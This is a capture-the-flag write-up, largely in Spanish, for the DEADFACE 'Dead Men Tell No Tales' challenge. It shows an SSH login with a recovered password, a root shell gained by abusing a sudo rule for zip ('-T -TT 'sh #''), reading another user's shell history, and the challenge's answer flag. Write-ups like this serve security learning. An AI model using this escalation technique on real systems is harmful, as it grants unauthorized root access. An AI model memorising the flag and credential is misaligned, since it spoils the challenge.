Dead Men Tell No Tales

Problema

Created by: syyntax

We've discovered a remote system used by DEADFACE. We're not sure what the password is, but we know Donnell Aulner has an account on that machine. We believe DEADFACE has stored valuable information on this machine. The flag exists on the machine in the format flag{some-text-here}. Submit the flag as flag{flag-goes-here}.Username: dracula

deadmen.deadface.io:22

Solución

Utilizamos la password que obtuvimos en otro chall para ingresar con el usuario de drácula

Imagen de la flag con la password del user dracula

Con esto tenemos el user: dracula y la password: L3t_m3_in para ingresar

└─$ ssh dracula@deadmen.deadface.io                                                       1 ⨯
dracula@deadmen.deadface.io's password: 
dracula@3d468a1d2ddc:~$ 

dracula@3d468a1d2ddc:~$ ls -lah /home
total 28K
drwxr-xr-x 1 root      root      4.0K Sep 19 01:37 .
drwxr-xr-x 1 root      root      4.0K Oct 18 04:02 ..
drwxr-xr-x 2 d34th     d34th     4.0K Sep 19 01:37 d34th
drwxr-xr-x 1 dracula   dracula   4.0K Sep 19 01:44 dracula
drwxr-xr-x 1 spookyboi spookyboi 4.0K Sep 19 01:39 spookyboi

dracula@3d468a1d2ddc:/home$ cd /home/spookyboi/
dracula@3d468a1d2ddc:/home/spookyboi$ ls -la
total 28
drwxr-xr-x 1 spookyboi spookyboi 4096 Sep 19 01:39 .
drwxr-xr-x 1 root      root      4096 Sep 19 01:37 ..
-rw------- 1 spookyboi spookyboi   93 Sep 19 01:39 .bash_history
-rw-r--r-- 1 spookyboi spookyboi  220 Sep 19 01:37 .bash_logout
-rw-r--r-- 1 spookyboi spookyboi 3771 Sep 19 01:37 .bashrc
-rw-r--r-- 1 spookyboi spookyboi  807 Sep 19 01:37 .profile
dracula@3d468a1d2ddc:/home/spookyboi$ cat .bash_history 
cat: .bash_history: Permission denied

Encontramos un file interesante pero no tenemos permisos. Busquemos como escalar.

dracula@3d468a1d2ddc:/home/spookyboi$ sudo -l
Matching Defaults entries for dracula on 3d468a1d2ddc:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dracula may run the following commands on 3d468a1d2ddc:
    (ALL) NOPASSWD: /usr/bin/zip

Tiene permisos sudo a ZIP . escalemos permisos con el comando

sudo zip algo /etc/hosts -T -TT 'sh #'

dracula@3d468a1d2ddc:/home/spookyboi$ sudo zip algo /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 34%)
# id
uid=0(root) gid=0(root) groups=0(root)
# /bin/bash
root@3d468a1d2ddc:/home/spookyboi#

Ya somos Root!. Hora de ir a por mas info

root@3d468a1d2ddc:/home/spookyboi# cat .bash_history 
cd ~
echo "flag{c4c089cdbe222b9360880a07c987b581c6f51609}" > flag.txt
rm flag.txt 
exit
exit
root@3d468a1d2ddc:/home/spookyboi# 

La flag se encontraba dentro del archivo.

flag{c4c089cdbe222b9360880a07c987b581c6f51609}